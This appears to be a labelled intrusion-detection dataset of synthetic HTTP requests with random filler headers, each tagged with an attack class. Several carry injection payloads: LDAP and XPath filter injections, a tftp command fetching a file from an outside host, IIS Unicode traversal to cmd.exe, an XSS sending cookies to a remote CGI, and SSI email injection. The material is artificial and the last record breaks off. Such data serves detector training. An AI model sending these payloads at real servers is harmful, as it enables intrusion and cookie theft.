UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 668x5866
Via: FTP/0.9 11.193.124.145, Qwoue/9.7 191.20.43.250, 5.8 www.frun.htm
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 044 www.ewuqbi.js "trhiteoe9" 
X-Forwarded-For: 73.197.107.241
X-Serial-Number: 38921697
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49665
Start - Id: 38811
class: LdapInjection
GET /tzb_R/rzMfh/snLBUovQP/vm/dbeo/dwaW6P/BekrL@KDdH3d/aldoodnhl2/ibhsioq0ie/lwiR/e8YqqL5be-8Eq5TAz4/lmE.shtml?HqorBNLPpty=54306026&hhAexa=696&tkLphOfeuterr9h=aOoucj4cxthW&lej=%3Fihwop%3A&esxyoezdooyirut=tenMtb8mpeanseo&nsnlntttapeacEo=8134&yho0=tiI&.If@NThST4s=%29++++%28++++%7C++++%28Mmo%3DarO*%29 HTTP/1.0
Host: 186.226.156.42:4
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 103.147.207.153
Cookie: mtcmRaaoei=068;usvtndigr2ehmLo=enggrmr3didmz;pD=74870294;542Ucusr=wtnoi5etzgi7;feygo=991661
Cookie2: $Version="19"
Date: Thu, 28 Dec 06 10:04:17 UTC
ETag: "954BYt15GW0-QKluibg"
Expect: stgenha=alean
From: r5dntkrl@nt5eetn.it
If-Modified-Since: Thu, 15 Nov 07 10:00:42 UTC
If-Unmodified-Since: Sat, 24 Apr 10 09:46:22 UTC
If-Match: "TNqQMRopKqO_0akyLY"
If-None-Match: *
If-Range: *
Max-Forwards: 199
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: NTLM bWgxaWNpbXFuYWFkbXRvbHRoZU9uaVNqbGlyZWhFbmV0Y3hsb2V0dGlZMnh1
Range: 65399-30
Referer: /nbno9.mdb
TE: deflate;q=0.3,trailers
Trailer: Pragma
User-Agent: nki8IyymOrm
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 6.4 www.aaiarxez.png:8, HTTP/9.9 www.s2pli.png, 7.3 200.115.93.220:755
Transfer-Encoding: deflate
Upgrade: nnttd/5.1, egt/5.4, hhil/2.6, yoxamn/4.2, errtdt/4.7
Warning: 354 127.67.125.193 "lfehrTuE" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38811
Start - Id: 43401
class: OsCommanding
GET /oro.jpeg?zIPMVIR=%27++++%3B+++++tftp+-c+++++get+++www.rollchti.com%3A%2Ftoic.tar&hr4ibmhenrrreIy=Ot0xtsni&7dkrMlxh7=sozx%2B HTTP/1.1
Host: 233.73.188.128
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-korean, windows-1257, iso-8859-4, windows-1258;q=0.6, windows-1252
Accept-Encoding: compress;q=0.9, gzip;q=0.0
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 19.131.79.59
Cookie: lte=9dd;eqbuif5cadbu=llk5wwP@y;6laioHuecsleus=97;OoMbbwXqNXGk=amTeinnw;enodsfeoittt=oE
Cookie2: $Version="5"
Date: Wed, 07 Feb 07 19:49:53 CET
ETag: W/"FBRRehdBHitCX2E"
Expect: n0nee
From: su7olsim@shSdnne.cz
If-Modified-Since: Thu, 01 Oct 09 13:32:51 GMT
If-Unmodified-Since: Sat, 04 Oct 08 08:21:27 GMT
If-Match: "d30xvdIrjFZxaS-v2WxE"
If-None-Match: "sA9an9x51rnIZvRAc"
If-Range: Sun, 12 Sep 04 22:37:09 GMT
Max-Forwards: 3
MIME-Version: 7.7
Pragma: cw=au
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://mertS.cz/iitepr/E6ydsge.msf
Range: -4315,8885-439,063-
Referer: /ecuntll/EeyN.css
TE: chunked;q=0.3
Trailer: If-Range
User-Agent: Mozilla/9.8 (X11; U; Linux i386 8.6; ca-dx; rv:1.8.7) Gecko/00984787
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9788x122
Via: lEeSkx/2.6 23.132.231.103, cho/3.1 54.194.148.4:13
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43401
Start - Id: 44217
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.m4nfkihhu.uk
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 48.142.236.180
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="370"
Date: Sat, 18 Sep 04 22:42:03 CET
ETag: W/"4YYbH-nJZmZTHi0FC"
Expect: et2ess1=aa0davZ;sinntl
From: rOaz@gEadsxsee.biz
If-Modified-Since: Wed, 10 May 06 16:35:04 UTC
If-Unmodified-Since: Tue, 27 Apr 04 11:13:00 UTC
If-Match: *
If-None-Match: *
If-Range: "1TVFAbk1gVPvL1D"
Max-Forwards: 6119
MIME-Version: 1.8
Pragma: zadee='l'
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: Digest qop=i8kedAln
Range: 09660-850419
Referer: http://it10cch.be/iswswo/geIA5eo/etzs.asp
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.6 (Windows; U; Win98 3.1; id-op; rv:8.2.6) Gecko/27064603
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 352x848
Via: 8.1 198.77.239.197
Transfer-Encoding: gzip
Upgrade: eeiw/8.3, Tc4cy/9.9, ciigE/9.1
Warning: 268 161.222.182.214 "sxsom" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44217
Start - Id: 50060
class: XPathInjection
PUT /eH/Cabssbotdo/ola/i-7kfRb21MHTGc/2I287SOWuF/pNpGts/ai2otaotqmtnsFln4a/i-pLmC5xjpeLFB.I-mG.jsp? HTTP/1.1
Content-Length: 189
Content-Language: rN,gb
Content-Encoding: deflate
Content-Location: /yswmxna/ssnao/eoaces.tiff
Content-MD5: aXRvZnlpZWRhY2xuZWRlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Jan 05 01:06:27 GMT
Last-Modified: Sat, 11 Oct 08 15:55:38 CET
Host: www.3ase.uk
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, iso-2022-kr;q=0.6
Accept-Encoding: deflate, identity
Accept-Language: ea-UtdEuit, ozm6afta-f
Cache-Control: only-if-cached
Client-ip: 78.20.93.165
Cookie: 9wp-xp_0_=formvd0n;lbszeassmTh=lt;eyirelOs=A3hgsTeetrpH;0kmYI7=1   or   count(path/child::node()[position()=((i+j+k+l+1)]   |   path/child::*()[position()=(k+1)])=1   or 717=;rneianh9se0rG=35636;aedicghtcd=toIoT9eneaitr
Cookie2: $Version="188"
Date: Fri, 09 Jan 04 17:06:00 GMT
ETag: W/"1@69SC6OhsctPUz"
Expect: 100-continue
From: tndo@hOino.uk
If-Modified-Since: Thu, 08 Apr 10 18:20:52 GMT
If-Unmodified-Since: Thu, 11 Mar 10 12:11:56 CET
If-Match: "4e4yTPA28OcvJLv5BU"
If-None-Match: "UrrPbYTBNZIb@h8Hr"
If-Range: Tue, 20 Nov 07 22:59:17 GMT
Max-Forwards: 25
MIME-Version: 1.9
Pragma: tEni8itd=Lqfd4i
Proxy-Authorization: Basic ZWVpZmluYTpybnJydDJlbw==
Authorization: Digest algorithm=ks7gtzaz
Range: 68-,-66180,-89
Referer: /uEkiseTm/dtet/gaTpf/yelorOu.pl
TE: gzip
Trailer: If-Modified-Since
User-Agent: ullee3 (sfcxnd; ejLtoxUF6)
UA-CPU: MIPS
UA-Disp: 086,0919,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3705x532
Via: 9.9 www.thfO.jpeg, FTP/2.7 123.98.110.203
Transfer-Encoding: ellnh
Upgrade: seeim/7.5, eeEad/9.1, noaakN/7.4, uat/4.4, Shme/3.3
Warning: 633 118.107.47.29 "ehmrqron" "Sun, 16 Apr 06 02:34:14 GMT"
X-Forwarded-For: 18.212.91.180
X-Serial-Number: 34243313236496
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ceeXboocoli8=800&iztnsoz=asbig6Amoym&eaoan148dirtfu=eOI&itatmhehneAtw5=algsfoheeagh&anpartrsit9=l?ta&snlnIa2o6se=$&UhlibSAFUM=hti&q9qzmfYC=00913659&BSTKgWhn=4628929795&oemUnudeeamn=rFdB

End - Id: 50060
Start - Id: 47976
class: XSS
GET /fkaxgd/e7uq470p4gK/nrNWA71I-5reYIx/wu/er/ly/i6bVO1E.0VszbH/leIhtthac.gif?ol=af%7Crs&6sadew=nH89ohSK&Bweers7mC=79&tw6dsoss2=3646792582&teon=%26vonsaeeIulliba&aogoibc6ho=4531173&ntsmid=1&ptguDblmy1p=nmrstylew&byts=9305666&42i=netcatr%3Ba%7E&arotgeoeyzt=5&VpassthruOx4Mb=%3Cbgsound++++src+++%3D%22+javascript%3A+++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.orse.com%2Fcgi-bin%2Fliasertama.cgi%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E&RhttpscTE05mFSB=EC&wree=%3Ds HTTP/1.0
Host: www.dbtuoec.st:5
Connection: keep-alive
Accept: image/png, application/*;q=0.7, image/jpeg
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: ypR-nBin89
Cache-Control: min-fresh=55126
Client-ip: 233.73.193.14
Cookie: fS=lm4aivuooDlery;execO-0d8swherewV=004;iettr=4806007;abp2aesheo=aIo;7Sq07ot=04Zs@0
Cookie2: $Version="0"
Date: Fri, 31 Aug 07 18:06:30 UTC
ETag: "kFEKDuKQ32KeyH6uwq"
Expect: 100-continue
From: etro@rlateera.gov
If-Modified-Since: Fri, 05 May 06 05:17:55 GMT
If-Unmodified-Since: Wed, 13 Oct 04 15:45:00 CET
If-Match: "6l3S98Vr--eL5cnN9oU"
If-None-Match: *
If-Range: "KS@_rDCk9NsUb.kxDdDr"
Max-Forwards: 986
MIME-Version: 0.3
Pragma: 3EtsTeto=nediHeN3
Proxy-Authorization: Digest nc=b2c271ed
Authorization: saeMvi u5li=itna
Range: -4,8-
Referer: /kshc/aomaegel.asp
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/7.9 (compatible; oorsw1eea; Unix; trhA)
UA-CPU: MIPS
UA-Disp: 719,994,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 480x167
Via: 9.5 www.hnaet9i.png, 5.5 www.5Sr6.htm
Transfer-Encoding: compress
Upgrade: eat/7.3, imnF/6.2, 5tcs/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 23.144.158.109
X-Serial-Number: 41529
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47976
Start - Id: 39449
class: SSI
GET /ma/wz0qE/kQ7EwX/c5PErcQ57P.aspx?hdhdeeyRsh=3smOu%24e51o+si&AytedcjdSqrh=fn%2Bc&ta_20ucatcidVii=97972901&4mu9AA=wom+Djtod&6xoqtnbcol=%3C%21--%23email+fromhost%3D%22www.859tteaa.com%22+tohost%3D%22mailbox.eNoRl.com%22+message%3D%22soaTd+ztl2ch+oTd3ATxh+Tcsa%22+fromaddress%3D%22ratwx.com%22+toaddress%3D%22nvao.dhu.com%22+subject%3D%22mje%22+sender%3D%22ewo.com%22+replyto%3D%22ng7w3H.com%22+cc%3D%22rkaa%22+inreplyto%3D%22svt+raod+ac%22+id%3D%22edrlmail%22+--%3E&nrqw0fbA5oonqop=zmiieretrtnotai&npau=1jGu_sXlZtW&egeeg=%28v&rut9rne=eao&sarsinhtezoooo=9502&sissmnalreeehs=sm9oeiillec&ssel4strSoipx=r9aKMA&cAwkewt2o3f0bn=7rgcnodeeiohoye+9%3AreplaceifO HTTP/1.0
Host: www.dEra7.com
Connection: close
Accept: */*
Accept-Charset: x-mac-korean, iso-2022-jp;q=0.7, x-mac-greek
Accept-Encoding: 
Accept-Language: gcagre-d0, dtECsf-aax75azq;q=0.7, pITnif-s
Cache-Control: 0of=iiFAr5k
Client-ip: 179.178.240.191
Cookie: hevigbl=83033;rejLmSil=e tje5wgetn;tii82hinhdD=eoih? hAiu4a;daswlezeber=56955;oinanhtbta30=irz0yiaox2wtytte
Cookie2: $Version="52"
Date: Wed, 10 Aug 05 12:16:48 UTC
ETag: W/"-q4NFYs21di0IyCY.g"
Expect: n3vemr=rIe6sb9
From: alitInca@hE8o0.it
If-Modified-Since: Wed, 09 Aug 06 09:05:52 CET
If-Unmodified-Since: Tue, 02 Oct 07 22:55:07 GMT
If-Match: *
If-None-Match: "ez4kgak4gfDr-36P"
If-Range: Sat, 11 Apr 09 11:39:49 GMT
Max-Forwards: 94
MIME-Version: 7.1
Pragma: ni=agw8fdea
Proxy-Authorization: rashN riiam=cssstki
Authorization: Digest nc=8896bF1C
Range: 993-
Referer: http://ed1r.it/eayteytd/sroEtla/aa04uen/idwshiV/eocftrt.php3
TE: chunked,gzip;q=0.5
Trailer: Warning
User-Agent: Mozilla/6.6 (X11; U; SunOS sun4u 1.3; nn-eD; rv:5.1.8) Gecko/95645664
UA-CPU: Sparc
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x2523
Via: srH3tn/7.4 160.214.66.136
Transfer-Encoding: rdrdd
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 799 37.15.16.235:0423 "eauhqipdaedde" "Thu, 30 Aug 07 24:57:07 CET"
X-Forwarded-For: 38.112.178.33
X-Serial-Number: 298841177786
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39449
Start - Id: 38832
class: LdapInjection
GET /saoo2Te8poaat06hpiE/ndZB2x0JLy/epS/LoCorog0ua7asefY/5N5D/hosepe6scp4ao/crnkpni/wPexecBtkA_EDdevalz/8lriatMsm/irlIlegfofno8oIoe4r.tiff?emna8la1Oio=6+de%28&R@BMuarViframeBallF=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&irostRep=lLo6einrttc&U9s-jl=868414496&ttR0ounottngnkt=ntmSno9e0&cstwizqhp=hv&srSlmbr95=al&aatsrcLqoai=5 HTTP/1.1
Host: 147.193.247.129:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.0
Accept-Language: *
Cache-Control: max-age=6374
Client-ip: 147.81.36.108
Cookie: 7thepd9iilaevv3=hsTr;aiceneedfahh=3830941;nr=de4euEut0is
Cookie2: $Version="4"
Date: Sun, 04 Sep 05 09:46:59 GMT
ETag: ".E54oRpEfAdmv5Espqw"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Mon, 24 Sep 07 17:18:19 CET
If-Unmodified-Since: Sun, 17 Jan 10 07:44:55 GMT
If-Match: *
If-None-Match: ".e65FPG@xdOUxIyWAF"
If-Range: "C8uIZy8BQ2Svtorr"
Max-Forwards: 7434
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: Basic OWF0ZWluOmNlempoYWY=
Range: 088-865,-53,38290-
Referer: http://lrmts2rh.st/0nkkf/0m93enp4/uvvzuso.asp
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/6.4 (X11; U; Linux i386 3.3; di-en; rv:3.2.8) Gecko/33331857
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/3.1 72.93.34.165:3939, FTP/3.2 www.sjansr.gif
Transfer-Encoding: deflate
Upgrade: 5e2/8.1, neual/2.6, shex0/3.0, srtfSe/9.7
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 19.112.51.121
X-Serial-Number: 465738
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38832
Start - Id: 36863
class: LdapInjection
GET /aa/eywTocftw2htsmuyfet/LT2vRx51boot.iniuD8odocumentH/aVBCjguNUKc/sg/Oh1/6h4kXGJMDVJApG/i_vu6bSWQy-KQ1ji35t/ob.ij/insertI/lnbE/eexHspasswdMnq.cgi? HTTP/1.0
Host: www.sspa.cz:5428
Connection: aneeulee
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: zitox)(|(ms8=*)
Cache-Control: max-stale=4347
Client-ip: 17.48.219.199
Cookie: qrrlhtincqto=lTTQAL;6hetjRwta=syes6icaz pst;munxladir=2624
Cookie2: $Version="498"
Date: Thu, 20 Aug 09 08:06:22 CET
ETag: W/"qpDcVlO37f0Z7AtqUKOf"
Expect: 100-continue
If-Unmodified-Since: Tue, 13 Jun 06 07:43:13 UTC
If-Match: "GNI8_BG.586WTu1Z"
If-None-Match: *
If-Range: Wed, 08 Nov 06 10:50:04 UTC
Max-Forwards: 6987
MIME-Version: 0.4
Pragma: tt9iT='ta'
Authorization: Digest qop=auth-int
Referer: /sNl0.dll
Trailer: Upgrade
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 4.4; mo-le; rv:3.7.1) Gecko/75634347
UA-Disp: 2222,7626,16
UA-Pixels: 3973x1983
Via: 9.0 183.44.67.255:68, HTTP/6.9 www.easw.shtml
Transfer-Encoding: compress
X-Forwarded-For: 207.34.209.252
----: -------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36863
Start - Id: 37221
class: LdapInjection
GET /8ahileseiico2ahret/ataep/K-unionX9oDTu/a0t3Neatitar5d/Sy0iX/lYeEesaC9/rC39TVQPGnrYfWP.sh?is=9ibidh6mehddauN9u&sfhelu2ir7rtau=saiu&hpecond6iaaSehr=493&RypooAtrreSa4ne=448&mUoyoGsa0=3449%29%28%26%28objectClass%3D3ceq%29%28%7C%28sn%3Dlnh%29%28cn%3Dvkcs+++J*%29%29&Iensiadh=o&6r5M=fuai&ivasoa=l&uneeIt7eOdsiebe=882152609&7itl7f7amom=H4fdt&dtaeeebs=84347387&havingevalEA=OfEus+n+lnol HTTP/1.1
Host: 25.161.102.42
Connection: keep-alive
Accept: audio/*;q=0.2, application/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: a9-n
Cache-Control: no-transform
Client-ip: 60.153.84.246
Cookie: aubaeit=htdozear;BuaHt4hla0=41
Cookie2: $Version="23"
Date: Fri, 12 Jan 07 08:58:10 GMT
ETag: W/"rZy5O4khBGnzJI7m1"
Expect: eesgne
From: hsosdtF@auonsc62n.be
If-Modified-Since: Sun, 10 Aug 08 18:39:43 GMT
If-Unmodified-Since: Sun, 25 Apr 10 23:03:03 GMT
If-Match: "WUclZDkjrH9trt3mOL"
If-None-Match: *
If-Range: Tue, 25 Nov 08 04:24:37 UTC
Max-Forwards: 0365
MIME-Version: 2.4
Pragma: eeli=8a
Proxy-Authorization: Digest realm
Authorization: Digest opaque="OnuSrle"
Range: -035
Referer: /4heegA.pdf
TE: chunked,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.7 (X11; U; Open BSD i586 7.7; an-ri; rv:9.5.4) Gecko/55804907
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 2.6 www.etaffMy.shtml:479
Transfer-Encoding: deflate
Upgrade: cleeI/2.9, MCtE/0.6, Tse/6.1, rge/4.6, esEkld/2.9
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37221
Start - Id: 48744
class: XPathInjection
GET /NiR/i_ZOFocR9zpIeI4xWImA/o1yCp2syHUVOrsWwD13/3A.R64ujNXnI.bin?taoendflnoro=i3&wgetlsI9oW=ws%27++++or+++++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28++i+++%2B++++j++%2B+k++%2B+l+%2B+1%29%5D++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++%27ra%27%3D%27+tnr7e%27++or&l8ondhwehwcacl=73349&ateh=71393&Ar40Rieee=rddrop&a69ridaMarotrq=dOGChk2a&ous7merlelt=22183&fne1daUEi=230607800&sea=uzc+%29&beedq=hBUEWY5PNt8j HTTP/1.0
Host: www.bRDtrl8.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip
Accept-Language: t2y9-srFrgn;q=0.7
Cache-Control: no-store
Client-ip: 52.241.218.21
Cookie: suonparnitse=kdetaw
Cookie2: $Version="1"
Date: Thu, 17 Jan 08 13:11:46 CET
ETag: W/"9vt2TJEjvqA2Zu.SH"
Expect: rIohir3
From: lYglyt2@7smfrhi.org
If-Modified-Since: Tue, 06 Jan 04 06:57:16 GMT
If-Unmodified-Since: Wed, 14 Apr 10 21:43:39 UTC
If-Match: "uT-ue5yiX1eUubDT."
If-None-Match: *
If-Range: Sun, 09 Sep 07 09:32:50 CET
Max-Forwards: 94
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="dmhss"
Authorization: taabj 5aosui=4vni8R0
Range: -506333,18704-151605
Referer: /6bRthees/hcmoo.jpeg
TE: deflate,gzip;q=0.2
Trailer: Via
User-Agent: Mozilla/4.2 (compatible; zoej3t; SunOS sun4u; Younawh2; tmnajam; arh2bf)
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: 2.0 www.nNmdo1t.htm, 9.0 179.133.73.65
Transfer-Encoding: compress
Upgrade: dHRher/7.4, eng/4.5
Warning: 110 www.nsio.html "gbuonm" "Sun, 29 Jul 07 09:27:30 CET"
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48744
Start - Id: 45771
class: PathTransversal
GET /apwA9tts0toopsoAt/tavcUnIxQIT6EdBy/ilFLednayevoHdyo/n6m1lRtgBeQgTHkO3Yer/oudXQ4.vd/jaQ/qreysf/aeQx8SzLW7fo3d2sdZnj/oiwadAsnToVyiS31rs/Bea/tF0Z3P91APi.sh?ssosOiheDeeetb=jUZB9lJ7UtXW&clq=v9WNv&2unade6oi4sd=30448960&oegjoo04os=%5CWINNT%5Csystem.ini HTTP/1.0
Host: www.2hm8bqr0.be
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: b-oiaizsi;q=0.1, s7ie-rstceg2;q=0.4
Cache-Control: min-fresh=142
Client-ip: 229.242.26.88
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="51"
Date: Fri, 18 Mar 05 19:50:53 UTC
ETag: "o-Sve-wo4yNnUq.x7"
Expect: 100-continue
From: N1sxs@zaktif.st
If-Modified-Since: Mon, 12 Mar 07 21:43:34 CET
If-Unmodified-Since: Tue, 09 Nov 04 15:10:39 CET
If-Match: "BMsax5dEFmjAEaLy0"
If-None-Match: *
If-Range: *
Max-Forwards: 824
MIME-Version: 2.0
Pragma: wprsju0=dENc
Proxy-Authorization: nE0np rioae=tsisa
Authorization: ApMa hfe8s=xotu3
Range: -500252,934-3694
Referer: http://saIux0p.uk/ht17lf/teerdrta/iian/tshe.avi
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: bdizdn
UA-CPU: 68000
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: 5.4 www.bh1bcn.jpeg:39915
Transfer-Encoding: mTkI; eessyt=Hcsigs
Upgrade: auRAi/6.1, wpa/2.1, dH7/6.3, c6nLr/9.1
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 46.216.57.172
X-Serial-Number: 5959177395
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45771
Start - Id: 49405
class: XPathInjection
GET /hetaukItmcuiaie2/o9f5I7bh.js?ofw=48492591&s5ncH=e%3E+l%25u&uMWeM2yol=nhuengsilsyOdn&DogGUlpasswd=+&ahee3=fa&0it=g9wWf&emqseoudmrtoe=nndtho%27+++or+++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28i++%2B++++j++++%2B++k+%2B++l++++%2B+1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++++%27tctpio%27++++%3D+%27+++++Qnyaeoc%27++++or&ee7e=383&EIivarO2IY=tsioppsHsdneys&edt1itVrsknT2r=ToarYhptnh4dlat&o3ehidhmsreog=olBtaeD&mytlbugtatezhs=rUx HTTP/1.0
Host: www.eRir.st
Connection: sebw
Accept: */*;q=0.0
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: deflate;q=0.5
Accept-Language: n5olt-anet9oh;q=0.9
Cache-Control: o='nsdsEr'
Client-ip: 81.222.19.244
Cookie: 8d1oil5=tsop1cry1y;aa5oeN8=367716408;ouodRdadnt=778;Ys8qiydNe=8t a2rinor4replace;Es@XNgTrsrnf=55
Cookie2: $Version="461"
Date: Tue, 04 Sep 07 17:21:29 GMT
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: pmtehnge
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Sat, 27 Mar 04 09:12:39 CET
If-Unmodified-Since: Sun, 18 Jan 09 01:06:25 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jul 05 19:04:47 GMT
Max-Forwards: 353
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM dWJzaGxuZXR5c3Nsbm5kdXJ6MHJkcjdhUmFkaGFqdGhpbnZobnNl
Authorization: o6hk nUnoo9=kdsnx
Range: 708062-
Referer: http://srrpk4.it/mipttk/Thalmd/3oiuMw/ahca.tar
TE: chunked;q=0.5,trailers
Trailer: If-Range
User-Agent: owhjxlbL5k http://www.5sopeAut.gov
UA-CPU: StrongARM
UA-Disp: 1318,8014,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.rnel.jpg, culrLe/8.7 131.60.168.121
Transfer-Encoding: compress
Upgrade: shoq/5.8, ecn/2.0, sha/2.4
Warning: 573 www.w0le3ue.js:98108 "oaMintne07soeaotcrtl" 
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 37054990
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49405
Start - Id: 49136
class: XPathInjection
GET /0C.rHNmFg_qdclMvPWC/eNPDhDLVFjNs-/iRwgetor/8rJRRD/nN5t7aa8es7t/naLVXnP_Q/miHo9a/JJMU-/sXImmROJaD7kJ15BT/comttSxndb9vrhi/98MCTpO.kS9piu/bqC7eMjWZiUclgJ.jpg?atatagekeiyf=eto%27+++++or+++1%3C+eic%2Ftoasm%2Frovi%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D30%5D+++or+%27ttN4%27++%3D%27&98atr=68459&u-1f53sAxiGu=7&sennwete5tetn=80251475&he=siItroautoexecarmdd&tadee=45&ncztTtnUr=eo0osuusy9+f9+leNndocument&nudo=76 HTTP/1.0
Host: 31.90.228.83
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-kr, x-mac-chinesetrad;q=0.9, shift_jis, windows-1250;q=0.5, cp-936
Accept-Encoding: deflate, gzip;q=0.9, deflate, compress
Accept-Language: 4ag4-AwfCears;q=0.3, tid-uf;q=0.6
Cache-Control: no-transform
Client-ip: 63.41.96.252
Cookie: gtppCiccedpc=1568642099;F0omZqh=bina>accepter\o
Cookie2: $Version="860"
Date: Thu, 05 Mar 09 09:26:39 UTC
ETag: "GgpzpScDa_69HXc"
Expect: 100-continue
From: NktwIe@earsOsuo.org
If-Modified-Since: Fri, 01 Oct 04 23:08:06 CET
If-Unmodified-Since: Thu, 04 Mar 04 12:55:09 CET
If-Match: "8381p5QNphbGnxUvL"
If-None-Match: "G1@RnWspNL4NplV4H"
If-Range: *
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: E11su gdAiio=W96tf0
Authorization: NTLM b2Jhc0RkQ3FlZHNuZWltZW50b2V0b2xvbjdlVG40ZXRzcnQ=
Range: 6-
